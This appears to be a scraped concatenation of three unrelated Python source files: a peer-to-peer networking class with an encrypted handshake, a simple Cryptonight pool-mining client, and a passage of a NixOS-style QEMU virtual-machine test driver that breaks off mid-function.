self._running = False
self._network_thread = None
self._msg_thread = None
self._mx = threading.Lock()
self._socket = None
self._read_sockets = []
self._write_sockets = []
self._error_sockets = [] # Check for error events
self._seen_ephem_keys = OrderedDict()
def startNetwork(self):
self._mx.acquire()
try:
self._csprng = rfc6979_hmac_sha256_initialize(secrets.token_bytes(32))
self._running = True
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind((self._p2p_host, self._p2p_port))
self._socket.listen(self._max_connections)
self._read_sockets.append(self._socket)
self._network_thread = threading.Thread(target=listen_thread, args=(self,))
self._network_thread.start()
self._msg_thread = threading.Thread(target=msg_thread, args=(self,))
self._msg_thread.start()
finally:
self._mx.release()
def stopNetwork(self):
self._mx.acquire()
try:
self._running = False
finally:
self._mx.release()
if self._network_thread:
self._network_thread.join()
if self._msg_thread:
self._msg_thread.join()
self._mx.acquire()
try:
if self._socket:
self._socket.close()
for peer in self._peers:
peer.close()
finally:
self._mx.release()
def add_connection(self, host, port, peer_pubkey):
self._sc.log.info('Connecting from %s to %s at %s %d', self._network_pubkey.hex(), peer_pubkey.hex(), host, port)
self._mx.acquire()
try:
address = (host, port)
peer_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
peer_socket.connect(address)
peer = Peer(address, peer_socket, peer_pubkey)
self._peers.append(peer)
self._error_sockets.append(peer_socket)
self._read_sockets.append(peer_socket)
finally:
self._mx.release()
self.send_handshake(peer)
def disconnect(self, peer):
self._sc.log.info('Closing peer socket %s', peer._address)
self._read_sockets.pop(self._read_sockets.index(peer._socket))
self._error_sockets.pop(self._error_sockets.index(peer._socket))
peer.close()
self._peers.pop(self._peers.index(peer))
def check_handshake_ephem_key(self, peer, timestamp, ephem_pk, direction=1):
# assert ._mx.acquire() ?
used = self._seen_ephem_keys.get(ephem_pk)
if used:
raise ValueError('Handshake ephem_pk reused %s peer %s', 'for' if direction == 1 else 'by', used[0])
self._seen_ephem_keys[ephem_pk] = (peer._address, timestamp)
while len(self._seen_ephem_keys) > MAX_SEEN_EPHEM_KEYS:
self._seen_ephem_keys.popitem(last=False)
def send_handshake(self, peer):
self._sc.log.debug('send_handshake %s', peer._address)
peer._mx.acquire()
try:
# TODO: Drain peer._recv_messages
if not peer._recv_messages.empty():
self._sc.log.warning('send_handshake %s - Receive queue dumped.', peer._address)
while not peer._recv_messages.empty():
peer._recv_messages.get(False)
msg = MsgHandshake()
msg._timestamp = int(time.time())
key_r = rfc6979_hmac_sha256_generate(self._csprng, 32)
k = PrivateKey(key_r)
msg._ephem_pk = PublicKey.from_secret(key_r).format()
self.check_handshake_ephem_key(peer, msg._timestamp, msg._ephem_pk)
ss = k.ecdh(peer._pubkey)
hashed = hashlib.sha512(ss + struct.pack('>Q', msg._timestamp)).digest()
peer._ke = hashed[:32]
peer._km = hashed[32:]
nonce = peer._km[24:]
payload = self._sc._version
nk = PrivateKey(self._network_key)
sig = nk.sign_recoverable(peer._km)
payload += sig
aad = msg.encode_aad()
aad += nonce
cipher = ChaCha20_Poly1305.new(key=peer._ke, nonce=nonce)
cipher.update(aad)
msg._ct, msg._mac = cipher.encrypt_and_digest(payload)
peer._sent_nonce = hashlib.sha256(nonce + msg._mac).digest()
peer._recv_nonce = hashlib.sha256(peer._km).digest() # Init nonce
peer._last_handshake_at = msg._timestamp
peer._ready = False # Wait for peer to complete handshake
self.send_msg(peer, msg)
finally:
peer._mx.release()
def process_handshake(self, peer, msg_mv):
self._sc.log.debug('process_handshake %s', peer._address)
# TODO: Drain peer._recv_messages
if not peer._recv_messages.empty():
self._sc.log.warning('process_handshake %s - Receive queue dumped.', peer._address)
while not peer._recv_messages.empty():
peer._recv_messages.get(False)
msg = MsgHandshake()
msg.decode(msg_mv)
try:
now = int(time.time())
if now - peer._last_handshake_at < 30:
raise ValueError('Too many handshakes from peer %s', peer._address)
if abs(msg._timestamp - now) > TIMESTAMP_LEEWAY:
raise ValueError('Bad handshake timestamp from peer %s', peer._address)
self.check_handshake_ephem_key(peer, msg._timestamp, msg._ephem_pk, direction=2)
nk = PrivateKey(self._network_key)
ss = nk.ecdh(msg._ephem_pk)
hashed = hashlib.sha512(ss + struct.pack('>Q', msg._timestamp)).digest()
peer._ke = hashed[:32]
peer._km = hashed[32:]
nonce = peer._km[24:]
aad = msg.encode_aad()
aad += nonce
cipher = ChaCha20_Poly1305.new(key=peer._ke, nonce=nonce)
cipher.update(aad)
plaintext = cipher.decrypt_and_verify(msg._ct, msg._mac) # Will raise error if mac doesn't match
peer._version = plaintext[:6]
sig = plaintext[6:]
pk_peer = PublicKey.from_signature_and_message(sig, peer._km)
# TODO: Should pk_peer be linked to public data?
peer._pubkey = pk_peer.format()
peer._recv_nonce = hashlib.sha256(nonce + msg._mac).digest()
peer._sent_nonce = hashlib.sha256(peer._km).digest() # Init nonce
peer._last_handshake_at = msg._timestamp
peer._ready = True
# Schedule a ping to complete the handshake, TODO: Send here?
peer._last_ping_at = 0
except Exception as e:
# TODO: misbehaving
self._sc.log.debug('[rm] process_handshake %s', str(e))
def process_ping(self, peer, msg_mv):
nonce = peer._recv_nonce[:24]
cipher = ChaCha20_Poly1305.new(key=peer._ke, nonce=nonce)
cipher.update(msg_mv[0: 2])
cipher.update(nonce)
mac = msg_mv[-16:]
plaintext = cipher.decrypt_and_verify(msg_mv[2: -16], mac)
ping_nonce = struct.unpack('>I', plaintext[:4])[0]
# Version is added to a ping following a handshake message
if len(plaintext) >= 10:
peer._ready = True
version = plaintext[4: 10]
if peer._version is None:
peer._version = version
self._sc.log.debug('Set version from ping %s, %s', peer._pubkey.hex(), peer._version.hex())
peer._recv_nonce = hashlib.sha256(nonce + mac).digest()
self.send_pong(peer, ping_nonce)
def process_pong(self, peer, msg_mv):
nonce = peer._recv_nonce[:24]
cipher = ChaCha20_Poly1305.new(key=peer._ke, nonce=nonce)
cipher.update(msg_mv[0: 2])
cipher.update(nonce)
mac = msg_mv[-16:]
plaintext = cipher.decrypt_and_verify(msg_mv[2: -16], mac)
pong_nonce = struct.unpack('>I', plaintext[:4])[0]
if pong_nonce == peer._ping_nonce:
peer._last_ping_rtt = (time.time_ns() // 1000) - peer._last_ping_at
else:
self._sc.log.debug('Pong received out of order %s', peer._address)
peer._recv_nonce = hashlib.sha256(nonce + mac).digest()
def send_ping(self, peer):
ping_nonce = random.getrandbits(32)
msg_bytes = struct.pack('>H', NetMessageTypes.PING)
nonce = peer._sent_nonce[:24]
cipher = ChaCha20_Poly1305.new(key=peer._ke, nonce=nonce)
cipher.update(msg_bytes)
cipher.update(nonce)
payload = struct.pack('>I', ping_nonce)
if peer._last_ping_at == 0:
payload += self._sc._version
ct, mac = cipher.encrypt_and_digest(payload)
msg_bytes += ct + mac
peer._sent_nonce = hashlib.sha256(nonce + mac).digest()
peer._last_ping_at = time.time_ns() // 1000
peer._ping_nonce = ping_nonce
self.send_msg(peer, msg_bytes)
def send_pong(self, peer, ping_nonce):
msg_bytes = struct.pack('>H', NetMessageTypes.PONG)
nonce = peer._sent_nonce[:24]
cipher = ChaCha20_Poly1305.new(key=peer._ke, nonce=nonce)
cipher.update(msg_bytes)
cipher.update(nonce)
payload = struct.pack('>I', ping_nonce)
ct, mac = cipher.encrypt_and_digest(payload)
msg_bytes += ct + mac
peer._sent_nonce = hashlib.sha256(nonce + mac).digest()
self.send_msg(peer, msg_bytes)
def send_msg(self, peer, msg):
msg_encoded = msg if isinstance(msg, bytes) else msg.encode()
len_encoded = len(msg_encoded)
msg_packed = bytearray(MSG_START_TOKEN) + struct.pack('>I', len_encoded) + msg_encoded
peer._socket.sendall(msg_packed)
peer._bytes_sent += len_encoded
def process_message(self, peer, msg_bytes):
logging.info('[rm] process_message %s len %d', peer._address, len(msg_bytes))
peer._mx.acquire()
try:
mv = memoryview(msg_bytes)
o = 0
msg_type = struct.unpack('>H', mv[o: o + 2])[0]
if msg_type == NetMessageTypes.HANDSHAKE:
self.process_handshake(peer, mv)
elif msg_type == NetMessageTypes.PING:
self.process_ping(peer, mv)
elif msg_type == NetMessageTypes.PONG:
self.process_pong(peer, mv)
else:
self._sc.log.debug('Unknown message type %d', msg_type)
finally:
peer._mx.release()
def receive_bytes(self, peer, bytes_recv):
# logging.info('[rm] receive_bytes %s %s', peer._address, bytes_recv)
len_received = len(bytes_recv)
peer._last_received_at = time.time()
peer._bytes_received += len_received
invalid_msg = False
mv = memoryview(bytes_recv)
o = 0
try:
while o < len_received:
if peer._receiving_length == 0:
if len(bytes_recv) < MSG_HEADER_LEN:
raise ValueError('Msg too short')
if mv[o: o + 2] != MSG_START_TOKEN:
raise ValueError('Invalid start token')
o += 2
msg_len = struct.unpack('>I', mv[o: o + 4])[0]
o += 4
if msg_len < 2 or msg_len > MSG_MAX_SIZE:
raise ValueError('Invalid data length')
# Precheck msg_type
msg_type = struct.unpack('>H', mv[o: o + 2])[0]
# o += 2 # Don't inc offset, msg includes type
if not NetMessageTypes.has_value(msg_type):
raise ValueError('Invalid msg type')
peer._receiving_length = msg_len
len_pkt = (len_received - o)
nc = msg_len if len_pkt > msg_len else len_pkt
peer._receiving_buffer = mv[o: o + nc]
o += nc
else:
len_to_go = peer._receiving_length - len(peer._receiving_buffer)
len_pkt = (len_received - o)
nc = len_to_go if len_pkt > len_to_go else len_pkt
peer._receiving_buffer = mv[o: o + nc]
o += nc
if len(peer._receiving_buffer) == peer._receiving_length:
peer._recv_messages.put(peer._receiving_buffer)
peer._receiving_length = 0
except Exception as e:
if self._sc.debug:
self._sc.log.error('Invalid message received from %s %s', peer._address, str(e))
# TODO: misbehaving
def test_onion(self, path):
self._sc.log.debug('test_onion packet')
def get_info(self):
rv = {}
peers = []
with self._mx:
for peer in self._peers:
peer_info = {
'pubkey': 'Unknown' if not peer._pubkey else peer._pubkey.hex(),
'address': '{}:{}'.format(peer._address[0], peer._address[1]),
'bytessent': peer._bytes_sent,
'bytesrecv': peer._bytes_received,
'ready': peer._ready,
'incoming': peer._incoming,
}
peers.append(peer_info)
rv['peers'] = peers
return rv
|
Miner.py
|
from JsonRpc2Client import *
from Utils import *
from Cryptonight import SubscriptionCryptonight
import socket, threading, urllib.parse, math
SubscriptionByAlgorithm = {
"cryptonight": SubscriptionCryptonight,
}
class Miner(JsonRpc2Client):
"""Simple mining client"""
class MinerWarning(JsonRpc2Client.RequestReplyWarning):
def __init__(self, message, reply, request = None):
JsonRpc2Client.RequestReplyWarning.__init__(self, 'Mining Sate Error: ' + message, reply, request)
class MinerAuthenticationException(JsonRpc2Client.RequestReplyException): pass
def __init__(self, url, username, password, algorithm, nb_threads):
JsonRpc2Client.__init__(self)
self._url = url
self._username = username
self._password = password
self.nb_threads = nb_threads
self._subscription = SubscriptionByAlgorithm[algorithm]()
self._job = None
self._submitted_shares = 0
self._accepted_shares = 0
def handle_reply(self, request, reply):
if reply.get("method") == "job":
self._handle_job(reply)
elif request:
if request.get("method") == "submit":
self._handle_submit(reply, request)
elif request.get("method") == "login":
self._handle_login(reply)
else:
raise Exception("Bad message state - no request", reply)
else:
raise Exception("Unknown message", reply, request)
def _handle_job_msg(self, job_msg):
blob = job_msg["blob"]
job_id = job_msg["job_id"]
target = job_msg["target"]
target = "".join([target[i:i+2] for i in range(0, len(target), 2)][::-1])
difficulty = math.floor((2**32 - 1) / int(target, 16))
self._spawn_job_thread(job_id, blob, target)
log("New job: job_id={} - difficulty={}".format(job_id, difficulty), LEVEL_DEBUG)
def _handle_job(self, reply):
if "params" not in reply or len(reply["params"]) != 3:
raise self.MinerWarning("Malformed job message", reply)
self._handle_job_msg(reply["params"])
def _handle_submit(self, reply, request):
if "result" not in reply or not reply["result"]:
log("Share - Invalid", LEVEL_INFO)
raise self.MinerWarning("Failed to accept submit", reply, request)
self._accepted_shares += 1
log("Accepted shares: {} / {}".format(self._accepted_shares, self._submitted_shares), LEVEL_INFO)
def _login(self):
#TODO: define user agent properly
params = {"login": self._username, "pass": self._password, "agent": "GGMiner/0.1"}
self.send(method="login", params=params)
def _handle_login(self, reply):
if "result" not in reply or "id" not in reply["result"]:
raise self.MinerWarning('Reply to login is malformed', reply)
result = reply["result"]
id = result["id"]
log("Login success. Subscription ID={}".format(id), LEVEL_DEBUG)
self._subscription.set_subscription(id)
self._handle_job_msg(result["job"])
def _spawn_job_thread(self, job_id, blob, target):
'''Stops any previous job and begins a new job.'''
# Stop the old job (if any)
if self._job:
self._job.stop()
# Create the new job
self._job = self._subscription.create_job(
job_id = job_id,
blob = blob,
target = target
)
def run(job, nonce_start, nonce_stride):
try:
for result in job.mine(nonce_start=nonce_start, nonce_stride=nonce_stride):
self.send(method = "submit", params = result)
self._submitted_shares += 1
log("Found share: " + str(result), LEVEL_DEBUG)
log("Hashrate: {}".format(human_readable_hashrate(job.hashrate)), LEVEL_INFO)
except Exception as e:
log("ERROR: {}".format(e), LEVEL_ERROR)
for n in range(self.nb_threads):
thread = threading.Thread(target=run, args=(self._job, n, self.nb_threads))
thread.daemon = True
thread.start()
def serve_forever(self):
url = urllib.parse.urlparse(self._url)
hostname = url.hostname or ''
port = url.port
log("Starting server on {}:{}".format(hostname, port), LEVEL_INFO)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, port))
self.connect(sock)
self._login()
while True:
time.sleep(10)
|
machine.py
|
from contextlib import _GeneratorContextManager
from pathlib import Path
from queue import Queue
from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple
import base64
import io
import os
import queue
import re
import shlex
import shutil
import socket
import subprocess
import sys
import tempfile
import threading
import time
from test_driver.logger import rootlog
CHAR_TO_KEY = {
"A": "shift-a",
"N": "shift-n",
"-": "0x0C",
"_": "shift-0x0C",
"B": "shift-b",
"O": "shift-o",
"=": "0x0D",
"+": "shift-0x0D",
"C": "shift-c",
"P": "shift-p",
"[": "0x1A",
"{": "shift-0x1A",
"D": "shift-d",
"Q": "shift-q",
"]": "0x1B",
"}": "shift-0x1B",
"E": "shift-e",
"R": "shift-r",
";": "0x27",
":": "shift-0x27",
"F": "shift-f",
"S": "shift-s",
"'": "0x28",
'"': "shift-0x28",
"G": "shift-g",
"T": "shift-t",
"`": "0x29",
"~": "shift-0x29",
"H": "shift-h",
"U": "shift-u",
"\\": "0x2B",
"|": "shift-0x2B",
"I": "shift-i",
"V": "shift-v",
",": "0x33",
"<": "shift-0x33",
"J": "shift-j",
"W": "shift-w",
".": "0x34",
">": "shift-0x34",
"K": "shift-k",
"X": "shift-x",
"/": "0x35",
"?": "shift-0x35",
"L": "shift-l",
"Y": "shift-y",
" ": "spc",
"M": "shift-m",
"Z": "shift-z",
"\n": "ret",
"!": "shift-0x02",
"@": "shift-0x03",
"#": "shift-0x04",
"$": "shift-0x05",
"%": "shift-0x06",
"^": "shift-0x07",
"&": "shift-0x08",
"*": "shift-0x09",
"(": "shift-0x0A",
")": "shift-0x0B",
}
def make_command(args: list) -> str:
return " ".join(map(shlex.quote, (map(str, args))))
def _perform_ocr_on_screenshot(
screenshot_path: str, model_ids: Iterable[int]
) -> List[str]:
if shutil.which("tesseract") is None:
raise Exception("OCR requested but enableOCR is false")
magick_args = (
"-filter Catrom -density 72 -resample 300 "
+ "-contrast -normalize -despeckle -type grayscale "
+ "-sharpen 1 -posterize 3 -negate -gamma 100 "
+ "-blur 1x65535"
)
tess_args = f"-c debug_file=/dev/null --psm 11"
cmd = f"convert {magick_args} {screenshot_path} tiff:{screenshot_path}.tiff"
ret = subprocess.run(cmd, shell=True, capture_output=True)
if ret.returncode != 0:
raise Exception(f"TIFF conversion failed with exit code {ret.returncode}")
model_results = []
for model_id in model_ids:
cmd = f"tesseract {screenshot_path}.tiff - {tess_args} --oem {model_id}"
ret = subprocess.run(cmd, shell=True, capture_output=True)
if ret.returncode != 0:
raise Exception(f"OCR failed with exit code {ret.returncode}")
model_results.append(ret.stdout.decode("utf-8"))
return model_results
def retry(fn: Callable, timeout: int = 900) -> None:
"""Call the given function repeatedly, with 1 second intervals,
until it returns True or a timeout is reached.
"""
for _ in range(timeout):
if fn(False):
return
time.sleep(1)
if not fn(True):
raise Exception(f"action timed out after {timeout} seconds")
class StartCommand:
"""The Base Start Command knows how to append the necesary
runtime qemu options as determined by a particular test driver
run. Any such start command is expected to happily receive and
append additional qemu args.
"""
_cmd: str
def cmd(
self,
monitor_socket_path: Path,
shell_socket_path: Path,
allow_reboot: bool = False, # TODO: unused, legacy?
) -> str:
display_opts = ""
display_available = any(x in os.environ for x in ["DISPLAY", "WAYLAND_DISPLAY"])
if not display_available:
display_opts += " -nographic"
# qemu options
qemu_opts = ""
qemu_opts += (
""
if allow_reboot
else " -no-reboot"
" -device virtio-serial"
" -device virtconsole,chardev=shell"
" -device virtio-rng-pci"
" -serial stdio"
)
# TODO: qemu script already catpures this env variable, legacy?
qemu_opts += " " + os.environ.get("QEMU_OPTS", "")
return (
f"{self._cmd}"
f" -monitor unix:{monitor_socket_path}"
f" -chardev socket,id=shell,path={shell_socket_path}"
f"{qemu_opts}"
f"{display_opts}"
)
@staticmethod
def build_environment(
state_dir: Path,
shared_dir: Path,
) -> dict:
# We make a copy to not update the current environment
env = dict(os.environ)
env.update(
{
"TMPDIR": str(state_dir),
"SHARED_DIR": str(shared_dir),
"USE_TMPDIR": "1",
}
)
return env
def run(
self,
state_dir: Path,
shared_dir: Path,
monitor_socket_path: Path,
shell_socket_path: Path,
) -> subprocess.Popen:
return subprocess.Popen(
self.cmd(monitor_socket_path, shell_socket_path),
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True,
cwd=state_dir,
env=self.build_environment(state_dir, shared_dir),
)
class NixStartScript(StartCommand):
"""A start script from nixos/modules/virtualiation/qemu-vm.nix
that also satisfies the requirement of the BaseStartCommand.
These Nix commands have the particular charactersitic that the
machine name can be extracted out of them via a regex match.
(Admittedly a _very_ implicit contract, evtl. TODO fix)
"""
def __init__(self, script: str):
self._cmd = script
@property
def machine_name(self) -> str:
match = re.search("run-(.+)-vm$", self._cmd)
name = "machine"
if match:
name = match.group(1)
return name
class LegacyStartCommand(StartCommand):
"""Used in some places to create an ad-hoc machine instead of
using nix test instrumentation + module system for that purpose.
Legacy.
"""
def __init__(
self,
netBackendArgs: Optional[str] = None,
netFrontendArgs: Optional[str] = None,
hda: Optional[Tuple[Path, str]] = None,
cdrom: Optional[str] = None,
usb: Optional[str] = None,
bios: Optional[str] = None,
qemuFlags: Optional[str] = None,
):
self._cmd = "qemu-kvm -m 384"
# networking
net_backend = "-netdev user,id=net0"
net_frontend = "-device virtio-net-pci,netdev=net0"
if netBackendArgs is not None:
net_backend += "," + netBackendArgs
if netFrontendArgs is not None:
net_frontend += "," + netFrontendArgs
self._cmd += f" {net_backend} {net_frontend}"
# hda
hda_cmd = ""
if hda is not None:
hda_path = hda[0].resolve()
hda_interface = hda[1]
if hda_interface == "scsi":
hda_cmd += (
f" -drive id=hda,file={hda_path},werror=report,if=none"
" -device scsi-hd,drive=hda"
)
else:
hda_cmd += f" -drive file={hda_path},if={hda_interface},werror=report"
self._cmd += hda_cmd
# cdrom
if cdrom is not None:
self._cmd += f" -cdrom {cdrom}"
# usb
usb_cmd = ""
if usb is not None:
# https://github.com/qemu/qemu/blob/master/docs/usb2.txt
usb_cmd += (
" -device usb-ehci"
f" -drive id=usbdisk,file={usb},if=none,readonly"
" -device usb-storage,drive=usbdisk "
)
self._cmd += usb_cmd
# bios
if bios is not None:
self._cmd += f" -bios {bios}"
# qemu flags
if qemuFlags is not None:
self._cmd += f" {qemuFlags}"
class Machine:
"""A handle to the machine with this name, that also knows how to manage
the machine lifecycle with the help of a start script / command."""
name: str
tmp_dir: Path
shared_dir: Path
state_dir: Path
monitor_path: Path
shell_path: Path
start_command: StartCommand
keep_vm_state: bool
allow_reboot: bool
process: Optional[subprocess.Popen]
pid: Optional[int]
monitor: Optional[socket.socket]
shell: Optional[socket.socket]
serial_thread: Optional[threading.Thread]
booted: bool
connected: bool
# Store last serial console lines for use
# of wait_for_console_text
last_lines: Queue = Queue()
callbacks: List[Callable]
def __repr__(self) -> str:
return f"<Machine '{self.name}'>"
def __init__(
self,
tmp_dir: Path,
start_command: StartCommand,
name: str = "machine",
keep_vm_state: bool = False,
allow_reboot: bool = False,
callbacks: Optional[List[Callable]] = None,
) -> None:
self.tmp_dir = tmp_dir
self.keep_vm_state = keep_vm_state
self.allow_reboot = allow_reboot
self.name = name
self.start_command = start_command
self.callbacks = callbacks if callbacks is not None else []
# set up directories
self.shared_dir = self.tmp_dir / "shared-xchg"
self.shared_dir.mkdir(mode=0o700, exist_ok=True)
self.state_dir = self.tmp_dir / f"vm-state-{self.name}"
self.monitor_path = self.state_dir / "monitor"
self.shell_path = self.state_dir / "shell"
if (not self.keep_vm_state) and self.state_dir.exists():
self.cleanup_statedir()
self.state_dir.mkdir(mode=0o700, exist_ok=True)
self.process = None
self.pid = None
self.monitor = None
self.shell = None
self.serial_thread = None
self.booted = False
self.connected = False
@staticmethod
def create_startcommand(args: Dict[str, str]) -> StartCommand:
rootlog.warning(
"Using legacy create_startcommand(),"
"please use proper nix test vm instrumentation, instead"
"to generate the appropriate nixos test vm qemu startup script"
)
hda = None
if args.get("hda"):
hda_arg: str = args.get("hda", "")
hda_arg_path: Path = Path(hda_arg)
hda = (hda_arg_path, args.get("hdaInterface", ""))
return LegacyStartCommand(
netBackendArgs=args.get("netBackendArgs"),
netFrontendArgs=args.get("netFrontendArgs"),
hda=hda,
cdrom=args.get("cdrom"),
usb=args.get("usb"),
bios=args.get("bios"),
qemuFlags=args.get("qemuFlags"),
)
def is_up(self) -> bool:
return self.booted and self.connected
def log(self, msg: str) -> None:
rootlog.log(msg, {"machine": self.name})
def log_serial(self, msg: str) -> None:
rootlog.log_serial(msg, self.name)
def nested(self, msg: str, attrs: Dict[str, str] = {}) -> _GeneratorContextManager:
my_attrs = {"machine": self.name}
my_attrs.update(attrs)
return rootlog.nested(msg, my_attrs)
def wait_for_monitor_prompt(self) -> str:
with self.nested("waiting for monitor prompt"):
assert self.monitor is not None
answer = ""
while True:
undecoded_answer = self.monitor.recv(1024)
if not undecoded_answer:
break
answer += undecoded_answer.decode()
if answer.endswith("(qemu) "):
break
return answer
def send_monitor_command(self, command: str) -> str:
self.run_callbacks()
with self.nested("sending monitor command: {}".format(command)):
message = ("{}\n".format(command)).encode()
assert self.monitor is not None
self.monitor.send(message)
return self.wait_for_monitor_prompt()
def wait_for_unit(self, unit: str, user: Optional[str] = None) -> None:
"""Wait for a systemd unit to get into "active" state.
Throws exceptions on "failed" and "inactive" states as well as
after timing out.
"""
def check_active(_: Any) -> bool:
info = self.get_unit_info(unit, user)
state = info["ActiveState"]
if state == "failed":
raise Exception('unit "{}" reached state "{}"'.format(unit, state))
if state == "inactive":
status, jobs = self.systemctl("list-jobs --full 2>&1", user)
if "No jobs" in jobs:
info = self.get_unit_info(unit, user)
if info["ActiveState"] == state:
raise Exception(
(
'unit "{}" is inactive and there ' "are no pending jobs"
).format(unit)
)
return state == "active"
with self.nested(
"waiting for unit {}{}".format(
unit, f" with user {user}" if user is not None else ""
)
):
retry(check_active)
def get_unit_info(self, unit: str, user: Optional[str] = None) -> Dict[str, str]:
status, lines = self.systemctl('--no-pager show "{}"'.format(unit), user)
if status != 0:
raise Exception(
'retrieving systemctl info for unit "{}" {} failed with exit code {}'.format(
unit, "" if user is None else 'under user "{}"'.format(user), status
)
)
line_pattern = re.compile(r"^([^=]+)=(.*)$")
def tuple_from_line(line: str) -> Tuple[str, str]:
match = line_pattern.match(line)
assert match is not None
return match[1], match[2]
return dict(
tuple_from_line(line)
for line in lines.split("\n")
if line_pattern.match(line)
)
def systemctl(self, q: str, user: Optional[str] = None) -> Tuple[int, str]:
if user is not None:
q = q.replace("'", "\\'")
return self.execute(
(
"su -l {} --shell /bin/sh -c "
"$'XDG_RUNTIME_DIR=/run/user/`id -u` "
"systemctl --user {}'"
).format(user, q)
)
return self.execute("systemctl {}".format(q))
def require_unit_state(self, unit: str, require_state: str = "active") -> None:
with self.nested(
"checking if unit ‘{}’ has reached state '{}'".format(unit, require_state)
):
info = self.get_unit_info(unit)
state = info["ActiveState"]
if state != require_state:
raise Exception(
"Expected unit ‘{}’ to to be in state ".format(unit)
+ "'{}' but it is in state ‘{}’".format(require_state, state)
)
def _next_newline_closed_block_from_shell(self) -> str:
assert self.shell
output_buffer = []
while True:
# This receives up to 4096 bytes from the socket
chunk = self.shell.recv(4096)
if not chunk:
# Probably a broken pipe, return the output we have
break
decoded = chunk.decode()
output_buffer += [decoded]
if decoded[-1] == "\n":
break
return "".join(output_buffer)
def execute(
self, command: str, check_return: bool = True, timeout: Optional[int] = 900
) -> Tuple[int, str]:
self.run_callbacks()
self.connect()
if timeout is not None:
command = "timeout {} sh -c {}".format(timeout, shlex.quote(command))
out_command = f"( set -euo pipefail; {command} ) | (base64 --wrap 0; echo)\n"
assert self.shell
self.shell.send(out_command.encode())
# Get the output
output = base64.b64decode(self._next_newline_closed_block_from_shell())
if not check_return:
return (-1, output.decode())
# Get the return code
self.shell.send("echo ${PIPESTATUS[0]}\n".encode())
rc = int(self._next_newline_closed_block_from_shell().strip())
return (rc, output.decode())
def shell_interact(self) -> None:
"""Allows you to interact with the guest shell
Should only be used during test development, not in the production test."""
self.connect()
self.log("Terminal is ready (there is no prompt):")
assert self.shell
subprocess.run(
["socat", "READLINE", f"FD:{self.shell.fileno()}"],
pass_fds=[self.shell.fileno()],
)
def succeed(self, *commands: str, timeout: Optional[int] = None) -> str:
"""Execute each command and check that it succeeds."""
output = ""
for command in commands:
with self.nested("must succeed: {}".format(command)):
(status, out) = self.execute(command, timeout=timeout)
if status != 0:
self.log("output: {}".format(out))
raise Exception(
"command `{}` failed (exit code {})".format(command, status)
)
output += out
return output
def fail(self, *commands: str, timeout: Optional[int] = None) -> str:
"""Execute each command and check that it fails."""
output = ""
for command in commands:
with self.nested("must fail: {}".format(command)):
(status, out) = self.execute(command, timeout=timeout)
if status == 0:
raise Exception(
"command `{}` unexpectedly succeeded".format(command)
)
output += out
return output
def wait_until_succeeds(self, command: str, timeout: int = 900) -> str:
"""Wait until a command returns success and return its output.
Throws an exception on timeout.
"""
output = ""
def check_success(_: Any) -> bool:
nonlocal output
status, output = self.execute(command, timeout=timeout)
return status == 0
with self.nested("waiting for success: {}".format(command)):
retry(check_success, timeout)
return output
def wait_until_fails(self, command: str, timeout: int = 900) -> str:
"""Wait until a command returns failure.
Throws an exception on timeout.
"""
output = ""
def check_failure(_: Any) -> bool:
nonlocal output
status, output = self.execute(command, timeout=timeout)
return status != 0
with self.nested("waiting for failure: {}".format(command)):
retry(check_failure)
return output
def wait_for_shutdown(self) -> None:
if not self.booted:
return
with self.nested("waiting for the VM to power off"):
sys.stdout.flush()
assert self.process
self.process.wait()
self.pid = None
self.booted = False
self.connected = False
def get_tty_text(self, tty: str) -> str:
status, output = self.execute(
"fold -w$(stty -F /dev/tty{0} size | "
"awk '{{print $2}}') /dev/vcs{0}".format(tty)
)
return output
def wait_until_tty_matches(self, tty: str, regexp: str) -> None:
"""Wait until the visible output on the chosen TTY matches regular
expression. Throws an exception on timeout.
"""
matcher = re.compile(regexp)
def tty_matches(last: bool) -> bool:
text = self.get_tty_text(tty)
if last:
self.log(
f"Last chance to match /{regexp}/ on TTY{tty}, "
f"which currently contains: {text}"
)
return len(matcher.findall(text)) > 0
with self.nested("waiting for {} to appear on tty {}".format(regexp, tty)):
retry(tty_matches)
def send_chars(self, chars: List[str]) -> None:
with self.nested("sending keys ‘{}‘".format(chars)):
for char in chars:
self.send_key(char)
def wait_for_file(self, filename: str) -> None:
"""Waits until the file exists in machine's file system."""
def check_file(_: Any) -> bool:
status, _ = self.execute("test -e {}".format(filename))
return status == 0
with self.nested("waiting for file ‘{}‘".format(filename)):
retry(check_file)
def wait_for_open_port(self, port: int) -> None:
def port_is_open(_: Any) -> bool:
status, _ = self.execute("nc -z localhost {}".format(port))
return status == 0
with self.nested("waiting for TCP port {}".format(port)):
retry(port_is_open)
def wait_for_closed_port(self, port: int) -> None:
def port_is_closed(_: Any) -> bool:
status, _ = self.execute("nc -z localhost {}".format(port))
return status != 0
with self.nested("waiting for TCP port {} to be closed"):
retry(port_is_closed)
def start_job(self, jobname: str, user: Optional[str] = None) -> Tuple[int, str]:
return self.systemctl("start {}".format(jobname), user)
def stop_job(self, jobname: str, user: Optional[str] = None) -> Tuple[int, str]:
return self.systemctl("stop {}".format(jobname), user)
def wait_for_job(self, jobname: str) -> None:
self.wait_for_unit(jobname)
def connect(self) -> None:
if self.connected:
return
with self.nested("waiting for the VM to finish booting"):
self.start()
assert self.shell
tic = time.time()
self.shell.recv(1024)
# TODO: Timeout
toc = time.time()
self.log("connected to guest root shell")
self.log("(connecting took {:.2f} seconds)".format(toc - tic))
self.connected = True
def screenshot(self, filename: str) -> None:
out_dir = os.environ.get("out", os.getcwd())
word_pattern = re.compile(r"^\w+$")
if word_pattern.match(filename):
filename = os.path.join(out_dir, "{}.png".format(filename))
tmp = "{}.ppm".format(filename)
with self.nested(
"making screenshot {}".format(filename),
{"image": os.path.basename(filename)},
):
self.send_monitor_command("screendump {}".format(tmp))
ret = subprocess.run("pnmtopng {} > {}".format(tmp, filename), shell=True)
os.unlink(tmp)
if ret.returncode != 0:
raise Exception("Cannot convert screenshot")
def copy_from_host_via_shell(self, source: str, target: str) -> None:
"""Copy a file from the host into the guest by piping it over the
shell into the destination file. Works without host-guest shared folder.
Prefer copy_from_host for whenever possible.
"""
with open(source, "rb") as fh:
content_b64 = base64.b64encode(fh.read()).decode()
self.succeed(
f"mkdir -p $(dirname {target})",
